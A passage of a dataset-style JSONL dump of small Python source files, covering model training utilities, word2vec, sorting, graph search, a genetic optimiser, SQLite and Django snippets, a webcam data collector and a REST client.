= open(file_path)\n lines = f.readlines()\n lines = [i.strip() for i in lines]\n lines = [i for i in lines if i]\n f.close()\n\n tmp_lr = 0.00001\n for line in lines:\n t, l = line.split()\n t = int(t)\n l = float(l)\n tmp_lr = l\n\n if epoch < t:\n lr = l\n break\n else:\n lr = tmp_lr\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n global_step = epoch * epoch_len\n print('epoch' + str(epoch) + ' learning rate: ' + str(lr) + '\\n')\n writer.add_scalar('lr', lr, global_step)\n\ndef accuracy_old(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\ndef accuracy(output, target, threshold):\n logits = torch.sigmoid(output) #torch.float32\n logits = logits.view(logits.size(0))\n logits_n = logits.detach().cpu().numpy() #np.float32\n logits_n = (logits_n >= threshold).astype(np.int64) #np.int64\n target_n = target.detach().cpu().numpy() #np.int64\n correct_num = np.sum((logits_n == target_n).astype(np.int64)) #np.int64\n acc = correct_num/output.size(0) #np.float64\n acc = float(acc) #float\n return acc\n\ndef precision_recall_F1(output, target, threshold):\n '''\n :param output:shape (N,), no sigmoid, numpy array, float32\n :param target: shape(N,), numpy array int64\n :param threshold: python number\n :return: precision recall F1 all float python number\n '''\n logits_n = special.expit(output)\n logits_n = (logits_n >= threshold).astype(np.int64) # np.int64\n target_n = target # np.int64\n\n TP = np.sum(target_n.astype(np.bool) & logits_n.astype(np.bool))\n\n precision = float(TP/np.sum(logits_n))\n recall = float(TP/np.sum(target_n))\n F1 = 2*precision*recall / (precision + recall)\n\n return precision, recall, F1\n\ndef AUROC(output, target):\n logits_n = special.expit(output)\n target_n = target # np.int64\n auroc = roc_auc_score(target_n, logits_n)\n return auroc\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\ndef save_checkpoint(state, is_best, epoch):\n if is_best:\n filepath = os.path.join(args.checkpoint_path, 'model{:0>3}best.pth'.format(epoch))\n torch.save(state, filepath)\n elif epoch % args.save_freq == 0:\n filepath = os.path.join(args.checkpoint_path, 'model{:0>3}.pth'.format(epoch))\n torch.save(state, filepath)\n\nif __name__ == '__main__':\n main()","sub_path":"classification/exp1_r50/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"23286734","text":"\ndef BubbleSort(al):\n \n swap=True\n while swap:\n swap=False\n for i in range(len(al)-1):\n if(al[i]>al[i+1]):\n al[i],al[i+1] =al[i+1],al[i]\n swap=True \n return 
al\n\t\narrayList=[1,2,3,4,5,6,67,787,34,67867,786754,56]\nprint(BubbleSort(arrayList))\n\t\n\t\n\n\t\n\t\n","sub_path":"BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"477561398","text":"import tensorflow as tf\nimport numpy as np\nimport nltk\nimport keras.preprocessing.text\nimport collections, math, os, random\n\n\n\nfile=open(\"questions-words.txt\",\"r\")\n\n\nlines=list()\nfor i,line in enumerate(file):\n lines.append(line.lower())\nlines=lines[1:] \ntrain_lines=list()\nfor line in lines:\n if line.split()[0] !=':':\n train_lines.append(line.split())\n\nwords=list()\nfor sents in train_lines:\n words.extend(sents)\n\n\ncount= collections.Counter(words).most_common() \n\n\nunique_words = [i[0] for i in count]\ndic = {w: i for i, w in enumerate(unique_words)} #dic, word -> id cats:0 dogs:1 ......\nvoc_size = len(dic)\n\n\n\n\n\ndata = [dic[word] for word in words] #count rank for every word in words\n\n\n\n\n\n\n\n\nskip_gram_pairs=list()\n\n\nskip_gram_pairs_words = list()\nfor i in range(len(train_lines)): \n for item in list(zip(train_lines[i][0:-1],train_lines[i][1:])):\n skip_gram_pairs_words.append(item )\n for item in list(zip(train_lines[i][0:-2],train_lines[i][2:])):\n skip_gram_pairs_words.append(item )\n \n \n \n k = list(ele for ele in reversed(train_lines[i]))\n for item in list(zip(k[0:-1],k[1:])):\n skip_gram_pairs_words.append(item )\n for item in list(zip(k[0:-2],k[2:])):\n skip_gram_pairs_words.append(item )\n \n \nfor i in range(len(skip_gram_pairs_words)):\n skip_gram_pairs.append(list([dic[skip_gram_pairs_words[i][0]],dic[skip_gram_pairs_words[i][1]]])) \n \n \n \nX_train=[]\nY_train=[]\n \nfor i in range(len(skip_gram_pairs)):\n Y_train.append(skip_gram_pairs[i][1])\n\nfor i in range(len(skip_gram_pairs)):\n X_train.append(skip_gram_pairs[i][0]) \nX_train=np.array(X_train)\nlist_of_batch_size=[16]\nlist_of_embedding_size=[64]\nlist_of_neg_samples=[1]\nfilelist=[\"file1.txt\",\"file2.txt\",\"file3.txt\",\"file4.txt\",\"file5.txt\",\"file6.txt\",\"file7.txt\",\"file8.txt\"]\nfor batch_size in list_of_batch_size:\n for embedding_size in list_of_embedding_size:\n for num_sampled in list_of_neg_samples:\n\n \n X= tf.placeholder(tf.int32,shape=[None]) #inputs\n Y= tf.placeholder(tf.int32,shape=[None,1]) #labels\n \n \n \n embeddings = tf.Variable(tf.random_normal([voc_size,embedding_size],-1.0,1.0))\n embed = tf.nn.embedding_lookup(embeddings, X) # lookup table\n \n \n nce_weights = tf.Variable(tf.random_normal([voc_size, embedding_size], stddev=1.0 / math.sqrt(embedding_size)))\n nce_biases = tf.Variable(tf.zeros([voc_size]))\n sess = tf.Session()\n init = tf.global_variables_initializer()\n sess.run(init)\n \n loss = tf.reduce_mean(tf.nn.nce_loss(weights=nce_weights,biases=nce_biases,labels=Y,inputs=embed,num_sampled=num_sampled,num_classes=voc_size))\n\n \n optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)\n n_iters = int(np.ceil(len(X_train)/batch_size))\n print(n_iters)\n Y_train = np.array(Y_train)\n \n epochs=151\n for cnt in range(epochs):\n index= 0\n for i in range(n_iters):\n sess.run(optimizer, feed_dict={X: X_train[index:index+batch_size], Y: np.expand_dims(Y_train[index:index+batch_size],axis=1)})\n index = index + batch_size\n if cnt % 10 == 0:\n print('loss is : ', sess.run(loss, feed_dict={X: X_train[0:batch_size], Y: np.expand_dims(Y_train[0:batch_size],axis=1)}))\n \n print('epoch %d done'%cnt) \n 
\n \n trained_embeddings = np.array(sess.run(embeddings))\n \n \n \n \n em_val=trained_embeddings.tolist()\n for i,item in enumerate(em_val):\n item.insert(0,unique_words[i])\n \n FF=[\" \".join(map(str,item)) for item in em_val] \n \n file=open(batch_size.__str__()+\"_\"+num_sampled.__str__()+\"_\"+embedding_size.__str__()+\"task2\"\".txt\",\"w\")\n\n \n for item in FF:\n file.write(\"%s\\n\" % item)\n file.close()\n \n \ndef euclidean_dist(vec1, vec2):\n return np.sqrt(np.sum((vec1-vec2)**2))\n\ndef find_closest(word_index, vectors):\n min_dist = 10000 # to act like positive infinity\n min_index = -1\n query_vector = vectors[word_index]\n for index, vector in enumerate(vectors):\n if euclidean_dist(vector, query_vector) < min_dist and not np.array_equal(vector, query_vector):\n min_dist = euclidean_dist(vector, query_vector)\n min_index = index\n return min_index\ninv_dic = {v:k for k, v in dic.items()}\ndef similar(text):\n i=dic[text];\n j=find_closest(i, trained_embeddings)\n print(inv_dic[j]) \n\n \n \ndef sortFirst(val): \n return val[0] \n \ndef nearest_k(word1,k):\n s=list()\n i=dic[word1]\n# j=dic[word2]\n# l=dic[word3]\n query_vector=trained_embeddings[i]\n for item in unique_words:\n vec=trained_embeddings[dic[item]]\n s.append([euclidean_dist(query_vector,vec),dic[item]])\n sorted_list=sorted(s,key = sortFirst)\n print(\"top-%d closest words\\n\"%k)\n \n for i in range(k):\n a=inv_dic[sorted_list[i][1]]\n print(a) \n \n","sub_path":"wor2vec.py","file_name":"wor2vec.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"458507721","text":"#!/usr/bin/env python3\n# MIT License\n#\n# Copyright (c) 2020 FABRIC Testbed\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n#\n# Author: Komal Thareja (kthare10@renci.org)\n\"\"\"\nImplements Avro representation of an Auth Token\n\"\"\"\nfrom fabric_mb.message_bus.message_bus_exception import MessageBusException\n\n\nclass AuthAvro:\n \"\"\"\n Implements Avro representation of an Auth Token\n \"\"\"\n # Use __slots__ to explicitly declare all data members.\n __slots__ = [\"name\", \"guid\", \"id_token\"]\n\n def __init__(self):\n self.name = None\n self.guid = None\n self.id_token = None\n\n def from_dict(self, value: dict):\n \"\"\"\n The Avro Python library does not support code generation.\n For this reason we must provide conversion from dict to our class for de-serialization\n :param value: incoming message dictionary\n \"\"\"\n self.name = value['name']\n if 'guid' in value and value['guid'] != \"null\":\n self.guid = value['guid']\n if 'id_token' in value and value['id_token'] != \"null\":\n self.id_token = value['id_token']\n\n def to_dict(self) -> dict:\n \"\"\"\n The Avro Python library does not support code generation.\n For this reason we must provide a dict representation of our class for serialization.\n :return dict representing the class\n \"\"\"\n if not self.validate():\n raise MessageBusException(\"Invalid arguments\")\n\n result = {\n \"name\": self.name\n }\n if self.guid is not None:\n result['guid'] = self.guid\n\n if self.id_token is not None:\n result['id_token'] = self.id_token\n return result\n\n def __str__(self):\n return \"name: {} guid: {} id_token: {}\".format(self.name, self.guid, self.id_token)\n\n def __eq__(self, other):\n if not isinstance(other, AuthAvro):\n return False\n return self.name == other.name and self.guid == other.guid and self.id_token == other.id_token\n\n def validate(self) -> bool:\n \"\"\"\n Check if the object is valid and contains all mandatory fields\n :return True on success; False on failure\n \"\"\"\n if self.name is None:\n return False\n return True\n","sub_path":"fabric_mb/message_bus/messages/auth_avro.py","file_name":"auth_avro.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"373424973","text":"\"\"\"\nCopyright [2020] [Carolina Oviedo]\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\"\"\" \n\nfrom django.urls import path \nfrom . 
import views\n\n\nurlpatterns =[\n    path('', views.index, name='index'),\n    path('edit/<int:id>/', views.edit, name='edit'),\n    path('delete/<int:id>/', views.deletetask, name='delete'),\n    path('complete/<int:id>/', views.completetask, name='complete'),\n    \n]","sub_path":"cockroach_todolist/listapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206684350","text":"\r\n\r\nfrom collections import deque\r\n# number of cities, number of roads, target distance, starting city number\r\nn,m,k,x = map(int,input().split())\r\n\r\ngraph = [[] for _ in range(n+1)]\r\n\r\nfor _ in range(m):\r\n    a,b = map(int,input().split())\r\n    graph[a].append(b)\r\nprint(graph)\r\n\r\nvisit = [-1] * (n+1)\r\nvisit[x] = 0\r\nans = []\r\n\r\n\r\nqueue = deque([x])\r\n\r\nwhile queue:\r\n    pick = queue.popleft()\r\n\r\n    for i in graph[pick]:\r\n        if visit[i]==-1:\r\n            queue.append(i)\r\n            visit[i] = visit[pick] + 1\r\n\r\nre = False\r\nfor i in range(len(visit)):\r\n    if k == visit[i]:\r\n        print(i)\r\n        re = True\r\nif re == False:\r\n    print(-1)","sub_path":"문제/DFS BFS/direction_citys.py","file_name":"direction_citys.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"323625938","text":"import os\nimport sys\nimport getopt\nimport re\n\n\ndef parseCorpus(inputFile,outputPrefix):\n\tfilehd = open(inputFile, \"r\")\n\tlines = filehd.readlines()\n\tfilehd.close()\n\n\tcnt = 0;\n\toutFile = outputPrefix + \"_\" + \"%04d\" % cnt + \".txt\"\n\touthd = open(outFile, \"w\")\n\tfor line in lines:\n\t\tif not re.search(\"PoemHunter\",line):\n\t\t\touthd.write(line)\n\t\telse:\n\t\t\touthd.close()\n\t\t\tcnt = cnt + 1\n\t\t\toutFile = outputPrefix + \"_\" + \"%04d\" % cnt + \".txt\"\n\t\t\touthd = open(outFile, \"w\")\n\ndef parseCorpusOnNewLines(inputFile,outputPrefix):\n\tfilehd = open(inputFile, \"r\")\n\tlines = filehd.readlines() #note, read whole file into a list of lines\n\tfilehd.close()\n\tcnt = 0;\n\t\n\thaveOpenedFile = False;\n\tfor line in lines:\n\t\tif not re.match(r'^\\n',line):\n\t\t\tif not haveOpenedFile:\n\t\t\t\toutFile = outputPrefix + \"_\" + \"%04d\" % cnt + \".txt\"\n\t\t\t\touthd = open(outFile, \"w\")\n\t\t\t\thaveOpenedFile = True;\n\t\t\t\tcnt = cnt + 1\n\t\t\touthd.write(line)\n\t\telse:\n\t\t\touthd.close()\n\t\t\thaveOpenedFile = False;\n\t\t\t\ndef printUsage():\n\tprint()\n\tprint(\"Usage: \" + sys.argv[0] + \" -i <input file> -o <output file prefix> -N (split on newlines)\")\n\tprint()\n\tsys.exit()\n\n\ndef main():\n\tinputFile = \"\"\n\toutputPrefix = \"\"\n\tsplitOnNewLines = False\n\n\tif(len(sys.argv) == 1):\n\t\tprintUsage()\n\telse:\n\t\ttry:\n\t\t\topts, args = getopt.getopt(sys.argv[1:], 'Ni:o:')\n\t\t\tfor o, a in opts:\n\t\t\t\tif o == '-i':\n\t\t\t\t\tinputFile = a\n\t\t\t\tif o == '-o':\n\t\t\t\t\toutputPrefix = a\n\t\t\t\tif o == '-N':\n\t\t\t\t\tsplitOnNewLines = True\n\n\t\t\tif(splitOnNewLines):\n\t\t\t\tparseCorpusOnNewLines(inputFile,outputPrefix)\n\t\t\telse:\n\t\t\t\tparseCorpus(inputFile,outputPrefix)\n\n\t\texcept getopt.GetoptError as err:\n\t\t\tprint(err) \n\t\t\t\t\nif __name__ == '__main__':\n\tmain()","sub_path":"02032021/parseCorpusText.py","file_name":"parseCorpusText.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"113225929","text":"from deap import creator, base, tools, algorithms\nimport numpy as np\nimport random\nimport math\nimport time\nfrom 
scipy.stats import bernoulli\nfrom objective_function.data_availability import data_storage_availability\nfrom objective_function.data_storage_time import data_storage_time\nfrom objective_function.data_storage_cost import data_storage_cost\nfrom parameters.parameters import m, n, csp_number\nfrom normalization.normalization import normalization\nfrom entropy.entropy import entropy_calculation\n\nstart = time.time()\n\n# -------------- NSGA-II algorithm implementation -----------\n# Problem definition\ncreator.create('MultiObjMin', base.Fitness, weights=(-1.0, -1.0, -1.0))\ncreator.create('Individual', list, fitness=creator.MultiObjMin)\n\ntoolbox = base.Toolbox()\ntoolbox.register('binary', bernoulli.rvs, 0.7)\ntoolbox.register('individual', tools.initRepeat, creator.Individual, toolbox.binary, n=csp_number)\ntoolbox.register('population', tools.initRepeat, list, toolbox.individual)\n\n\n# Evaluation function\ndef objective_function(ind):\n    # print(\"availability is: \", data_storage_availability(ind))\n    return -math.log(data_storage_availability(ind), 1.5), data_storage_time(ind), data_storage_cost(ind)\n\n\ndef feasible(ind):\n    count = 0\n    for i in range(0, len(ind)):\n        if ind[i] == 1:\n            count += 1\n    if count == (m + n):\n        return True\n    return False\n\n\ntoolbox.register('evaluate', objective_function)\ntoolbox.decorate('evaluate', tools.DeltaPenalty(feasible, (1000, 1000, 1000)))\n\n# Register the operators\ntoolbox.register('selectGen1', tools.selTournament, tournsize=2)\ntoolbox.register('select', tools.emo.selNSGA2)\ntoolbox.register('mate', tools.cxUniform, indpb=0.9)\ntoolbox.register('mutate', tools.mutShuffleIndexes, indpb=0.05)\n\n# Main genetic algorithm program\n# Parameter settings\ntoolbox.popSize = 100\ntoolbox.maxGen = 200\ntoolbox.cxProb = 0.7\ntoolbox.mutateProb = 0.2\n\n\nstart = time.time()\n\npop = toolbox.population(toolbox.popSize)\n# print(\"Population is: \", pop)\n# print(type(pop))\n# Iteration section\n# First generation\n\nfitnesses = toolbox.map(toolbox.evaluate, pop)\nfor ind, fit in zip(pop, fitnesses):\n    ind.fitness.values = fit\nfronts = tools.emo.sortNondominated(pop, k=toolbox.popSize)\n# Set each individual's fitness to the rank of its Pareto front\nfor idx, front in enumerate(fronts):\n    for ind in front:\n        ind.fitness.values = (idx+1),\n# Create offspring\noffspring = toolbox.selectGen1(pop, toolbox.popSize)  # binary tournament selection\noffspring = algorithms.varAnd(offspring, toolbox, toolbox.cxProb, toolbox.mutateProb)\n\n# Iterations from the second generation onward\nfor gen in range(1, toolbox.maxGen):\n    print(\"This is the \", gen, \" 's generation....\")\n    combinedPop = pop + offspring  # Merge parents and offspring\n    # Evaluate the population\n    fitnesses = toolbox.map(toolbox.evaluate, combinedPop)\n    data_availability = []\n    data_time = []\n    data_cost = []\n    # print(\"Fitnesses are: \", list(fitnesses))\n    for ind, fit in zip(combinedPop, fitnesses):\n        ind.fitness.values = fit\n        # print(\"Fitness value is: \", ind.fitness.values)\n        # print(ind.fitness.values[0])\n        data_availability.append(fit[0])\n        data_time.append(fit[1])\n        data_cost.append(fit[2])\n\n    data_availability = normalization(data_availability)\n    data_cost = normalization(data_cost)\n    data_time = normalization(data_time)\n\n    distance = []\n    for i in range(0, len(data_availability)):\n        distance.append(np.sqrt(data_availability[i] ** 2 + data_cost[i] ** 2 + data_time[i] ** 2))\n\n    distance.sort()\n    # print(distance[0])\n\n    # Fast non-dominated sorting\n    fronts = tools.emo.sortNondominated(combinedPop, k=toolbox.popSize, first_front_only=False)\n    # Crowding distance computation\n    for front in fronts:\n        tools.emo.assignCrowdingDist(front)\n    # Environmental selection -- keep the elites\n    pop = []\n    for front in fronts:\n        pop += front\n    pop = toolbox.clone(pop)\n    pop = tools.selNSGA2(pop, k=toolbox.popSize, 
nd='standard')\n\n    # Create offspring\n    offspring = toolbox.select(pop, toolbox.popSize)\n    offspring = toolbox.clone(offspring)\n    offspring = algorithms.varAnd(offspring, toolbox, toolbox.cxProb, toolbox.mutateProb)\n\n# print(\"Time cost is: \", end - start)\n\nprint(len(offspring))\nfront = tools.emo.sortNondominated(offspring, len(offspring))[0]\n# print(type(front))\n\n# fronts = []\n#\n# for i in range(0, len(front)):\n#     fronts.append(front[i][0])\n\n# print(\"fronts are: \", offspring)\n## Filter out infeasible individuals\n\n\ndef calculate_1(front):\n    count = 0\n    for i in range(len(front)):\n        if front[i] == 1:\n            count += 1\n    return count\n\nfront_after = []\n\nfor i in range(len(front)):\n    if calculate_1(front[i]) == 7:\n        front_after.append(front[i])\n\n# print(front_after)\n\n# Build a matrix of objective values\nresult = []\nfor i in range(len(front_after)):\n    tmp = [objective_function(front_after[i])[0], objective_function(front_after[i])[1], objective_function(front_after[i])[2]]\n    result.append(tmp)\n\n# for i in range(len(front)):\n#     tmp = [objective_function(front[i])[0], objective_function(front[i])[1], objective_function(front[i])[2]]\n#     result.append(tmp)\n\n\nqos_set = entropy_calculation(result)\nindex_optimal = qos_set.index(max(qos_set))\n# print(index_optimal)\nprint(\"The best qos is: \", qos_set[index_optimal])\n\nprint(front_after[index_optimal])  # index_optimal indexes qos_set, which was built from front_after\n\n# print(\"Front is: \", front)\nend = time.time()\nprint(\"Time cost is: \", end - start)","sub_path":"graduation/2018级/hudengcheng/code/code/storage_allocation_code/NSGA2/NSGA2.py","file_name":"NSGA2.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"518241992","text":"#!/usr/bin/env python3\nimport sqlite3\n#some initial data\nzone = 'kitchen';\ntemperature = 13.3;\ndate = '2020-10-01';\ntime = '20:50:50';\n#connect to database file\ndbconnect = sqlite3.connect(\"mydatabase.db\");\n#If we want to access columns by name we need to set\n#row_factory to sqlite3.Row class\ndbconnect.row_factory = sqlite3.Row;\n#now we create a cursor to work with db\ncursor = dbconnect.cursor();\nfor i in range(10):\n    #execute insert statement\n    if i in (1, 4, 7, 10):\n        zone = 'kitchen';\n    elif i in (2, 5, 8):\n        zone = 'greenhouse';\n    else:\n        zone = 'garage';\n    temperature += 1.1;\n    cursor.execute('''insert into temps values (?, ?, ?, ?)''',\n                   (date, time, zone, temperature));\ndbconnect.commit();\n#create new table\ncursor.execute('CREATE TABLE ages(name TEXT, dateofbirth DATE, age NUMERIC)');\n#fill new table with data\ncursor.execute('''insert into ages values ('Cris', '2013-10-05', 6)''')\ncursor.execute('''insert into ages values ('Bob', '1993-11-23', 26)''')\ncursor.execute('''insert into ages values ('Dean', '2006-03-14', 14)''')\ncursor.execute('''insert into ages values ('Nico', '2012-04-12', 8)''')\ndbconnect.commit();\n\n#execute simple select statement\ncursor.execute('SELECT * FROM temps');\n#print data\nfor row in cursor:\n    print(row['tdate'],row['ttime'],row['zone'],row['temperature'] );\n#execute simple select statement\ncursor.execute('SELECT * FROM ages');\n#print data\nfor row in cursor:\n    print(row['name'],row['dateofbirth'],row['age'] );\n#close the connection\ndbconnect.close();\n","sub_path":"Lab_3/pydb.py","file_name":"pydb.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32508970","text":"#\n\nfrom framework.BasicModel import BasicModel\nfrom framework.ConvBlocks import 
LinearBlock\nimport torch.nn as nn\nimport torch\n\n\nclass FCClassifier(BasicModel):\n    def __init__(self):\n        super().__init__()\n\n        self.m_layers = nn.Sequential(\n            nn.LayerNorm(192, elementwise_affine=False),\n            #nn.BatchNorm1d(192, affine=False),\n            LinearBlock(192, 120, normModule=nn.LayerNorm(120, elementwise_affine=False)),\n            nn.Dropout(p=0.5),\n            LinearBlock(120, 70, normModule=nn.LayerNorm(70, elementwise_affine=False)),\n            nn.Dropout(p=0.5),\n            LinearBlock(70, 40, normModule=nn.LayerNorm(40, elementwise_affine=False)),\n            nn.Dropout(p=0.5),\n            LinearBlock(40, 1, useNonLinearActivation=False)  # output logits, which needs sigmoid inside the loss function.\n        )\n\n\n    def forward(self, x, gts=None):\n        device = x.device\n        x = self.m_layers(x)\n\n        if gts is None:\n            return x  # output logits\n        else:\n            # compute loss (computing it here saves main-GPU memory)\n            loss = torch.tensor(0.0).to(device)\n            for lossFunc, weight in zip(self.m_lossFuncList, self.m_lossWeightList):\n                if weight == 0:\n                    continue\n                lossFunc.to(device)\n                gts = gts.view_as(x)\n                loss += lossFunc(x, gts) * weight\n\n            return x, loss\n\n","sub_path":"ResponsePrediction/FCClassifier.py","file_name":"FCClassifier.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"41218749","text":"''' Exercise 3\n\tConditions\n'''\nimport datetime\n\nNAME = \"Jesper\"\nAGE = 34\nCURTIME = datetime.datetime.now()\nNOW_YEAR = CURTIME.year\n\nfor i in range(-12, 12, 3):\n    tense = \"will be\"\n    if i < 0:\n        tense = \"was\"\n    elif i == 0:\n        tense = \"is\"\n    print(\"In %d, %s %s %d years old.\" % (NOW_YEAR+i, NAME, tense, AGE+i))\n    if (AGE+i) % 10 == 0:\n        print(\"\\tRound birthday.\")\n","sub_path":"python-intro-3/e03d-if-conditions-date-year.py","file_name":"e03d-if-conditions-date-year.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653834201","text":"import cv2\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nfrom time import sleep\nfrom time import gmtime, strftime\nimport os\n\nclass Microwave(object):\n    def __init__(self):\n        # Camera------------------------------------ \n        self.cam = cv2.VideoCapture(0)\n        if not(self.cam.isOpened()):\n            print('Error opening camera')\n        \n        self.capture_delay = 0.5 # seconds\n        self.capture_delay_ms = int(self.capture_delay*1000)\n        \n        no_errors, img = self.cam.read()\n        if img is None:\n            print(\"Image NoneType\")\n            return  # __init__ must not return a value; just bail out\n        if no_errors:\n            self.rotated_img = self.rotate_img(img, 180)\n        \n        # GUI----------------------------------------\n        self.root = Tk() \n        self.btnRun_lbl = \"Run\"\n        self.btnStop_lbl = \"Stop\"\n        self.btnFacingDoor_lbl = \"Facing Door\"\n        \n        no_img = cv2.imread(\"no_img.jpg\", 0)\n        no_img = Image.fromarray(no_img)\n        self.no_img = ImageTk.PhotoImage(no_img)\n        \n        # Functionality------------------------------\n        self.flg_run = False\n        self.flg_handle = False\n        self.img_path = \"Images/\"\n        \n        self.img_index = self.get_img_index()\n        \n    def get_img_index(self):\n        subdirs = os.listdir(self.img_path)\n        classes = [each for each in subdirs if os.path.isdir(self.img_path + each)]\n        return max([int(f[:-4]) for c in classes for f in next(os.walk(self.img_path + c))[2] if f.endswith(\".jpg\")]) + 1\n    \n    def facing_door(self, event):\n        self.flg_handle = True\n        print(\"Facing Door\")\n    \n    def not_facing_door(self, event):\n        self.flg_handle = False\n        print(\"Not Facing Door\")\n    \n    def 
launch(self):\n        btnRun = Button(self.root, text=self.btnRun_lbl, command=self.btn_run_press)\n        btnRun.grid(row=2, column=0, sticky=N+S+E+W)\n\n        btnStop = Button(self.root, text=self.btnStop_lbl, command=self.run_stop)\n        btnStop.grid(row=2, column=1, sticky=N+S+E+W)\n\n        btnFacingDoor = Button(self.root, text=self.btnFacingDoor_lbl)\n        btnFacingDoor.grid(row=2, column=2, sticky=N+S+E+W)\n        btnFacingDoor.bind('<ButtonPress-1>', self.facing_door)\n        btnFacingDoor.bind('<ButtonRelease-1>', self.not_facing_door)\n        \n        self.display_img = Label(image=self.no_img)\n        self.display_img.grid(row=0, columnspan=3)\n\n        self.root.mainloop()\n    \n    def rotate_img(self, img, angle):\n        rows, cols, _ = img.shape\n        M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n        return cv2.warpAffine(img, M, (cols,rows))\n    \n    def btn_run_press(self):\n        self.run_start()\n    \n    def run_start(self):\n        print(\"Run Start\")\n        self.flg_run = True\n        \n        # Instantiate Callback Timer\n        self.root.after(self.capture_delay_ms, self.update_img)\n        \n    def run_stop(self):\n        print(\"Run Stop\")\n        self.flg_run = False\n    \n    def cam_capture(self):\n        no_errors, img = self.cam.read()\n        if img is None:\n            print(\"Image NoneType\")\n            return (False, self.no_img)\n        if no_errors:\n            self.rotated_img = self.rotate_img(img, 180)\n            camera = cv2.cvtColor(self.rotated_img, cv2.COLOR_BGR2RGB)\n            camera = Image.fromarray(camera)\n            camera = ImageTk.PhotoImage(camera)\n            return (True, camera)\n        else:\n            print(\"Image Errors\")\n            return (False, self.no_img)\n    \n    def update_img(self):\n        if self.flg_run == False:\n            return\n        \n        success, camera = self.cam_capture()\n        self.display_img.configure(image=camera)\n        self.display_img.image = camera\n        if success:\n            print(\"Success\")\n            filename = str(self.img_index) +\".jpg\"\n            path = self.img_path + str(self.flg_handle) + \"/\" + filename\n            cv2.imwrite(path, self.rotated_img)\n            self.img_index += 1\n        \n        # Re-Instantiate Callback Timer\n        self.root.after(self.capture_delay_ms, self.update_img)\n\nm = Microwave()\nm.launch()","sub_path":"Collect_Data.py","file_name":"Collect_Data.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"255440613","text":"import requests\nimport os\nfrom utils.env_utils import *\nAPI_URL = read_env('API_URL')\ndef createCard(cards):\n    for c in cards:\n        my_card = c.get_card()\n        obj = {}\n        if 'tags' in my_card:\n            obj = {'texto':f'{my_card[\"texto\"]}','tags':my_card[\"tags\"]}\n            print(obj)\n        else:\n            obj = {'texto':f'{my_card[\"texto\"]}'}\n            print(obj)\n        r = requests.post(f\"{API_URL}/cards\",json=obj)\n        if r.status_code != 201:\n            print(\"Ocorreu um erro ao inserir um card\")\n            return 